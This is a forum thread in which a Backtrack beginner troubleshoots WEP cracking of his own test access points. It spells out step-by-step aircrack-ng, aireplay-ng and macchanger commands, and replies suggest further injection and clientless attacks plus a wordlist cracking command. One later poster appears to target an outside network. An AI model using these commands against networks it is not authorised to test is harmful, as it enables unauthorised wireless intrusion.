Packet Injection

[stevet]

Hi all,

First off please be tame with me I am a new Backtrack 4 user and I’m also fairly new to Linux (although have been lightly using variations for the past 6months)

Sorry if this should have gone in the hardware section although the 'n00b' area seemed more fitting.

The problem I’m having at the moment seems to packet injecting to AP's.

I have been reading up on various websites/videos on how to crack wep.

I started by cracking my 128bit wep key on my mobile phone tether. I managed this is under 7 mins (not bad for a first go ) but had forced traffic from multiple clients by simultaneously downloading large iso files.

I have now moved onto my next step in my education and setup a 2nd AP at my home with basic wep encryption again. This time however the plan is to have no traffic on the router so I have to packet inject.

Here is what I’m doing so far.

- airmon-ng
- airmon-ng stop wlan0
- ifconfig wlan0 down
- macchanger -m 00:11:22:33:44:55 wlan0
- airmon-ng start wlan0
- Airodump-ng wlan0
- Airodump-ng --bssid (XX:XX:XX:XX:XX) --channel (channel number) -o ivs -w /root/(filename) wlan0

New window

- aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e [essid] wlan0

My return message as follows,

Sending Authentication request (open system) [ACK]
Authentication successful
Sending Association Request [ACK]
Association successful :-) (AID: 1)

- airplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0

My return message as follows,

Waiting for beacon frame (BSSID: 00:0F:3D:FDC:CE) on channel 1
saving ARP requests in replay_arp-0823-060014.cap
You should also start airodump-ng to capture replies.
Read XXXX packets (got 0 ARP requests and 0 ACKs) sent 0 packets...(0 pps)

So from what I understand so far my codes are correct? Yet I am unable to send packets to the AP?

I'm Using an Aspire One Notebook using an Atheros AR5006X wireless card. Everything I can find on the net states this card is compatible with Backtrack and can packet inject.

So hopefully this is where some of the more experienced lot are step in and point me in the right direction before I pull my hair out. Is it my card? Are my codes wrong?

Many thanks,

- Steve

[Handsome-geek]

try aireplay-ng -2 -p 0841 attack you can see whole code on aircrack-ng wiki.

This can help not all ap have same behaviour.

also try clientless wep attack. For this use: fragmentation and chop chop attack this can use when there is only wired client. So then you will have larger picture what all types of attack can someone use in wep cracking and also pros and cons and when is some attack good and when not.


P.s. - why you change your mac its not nessecary if you dont have mac filter enabled and if you control your lab this can help bad guys to hide his real mac making forensics job harder.

Dont just retype code from other tutorials not knowing what is for what.

[iw2012]

Hi guys,

Can you help me with my command line? i need to fogure out how to input a white space on the bssid?

Example?

aireplay-ng -1 0 -a (Internet"Whitespace"Wireless) -h 00:11:22:33:44:55 -e [essid] wlan0

Thanks!

[mixit]

@iw2012
Google BSSID. It cannot have white space.

[kidFromBigD]

@iw2012
Google BSSID. It cannot have white space.

Correct. The BSSID is the MAC address of the AP, while the ESSID is the name given the AP by its owner. There are examples aplenty of spaces and other strange characters in ESSIDs.

Handling those cases involves, usually, double quotes and such:

Code:

aircrack-ng -w wordlist.txt -e "Secure&Monitored" cap1.cap

Cheers.

[iw2012]

This is what was looking for..

aireplay-ng -1 0 -a "Internet Wireless" -h 00:11:22:33:44:55 -e [essid] wlan0

Thank you.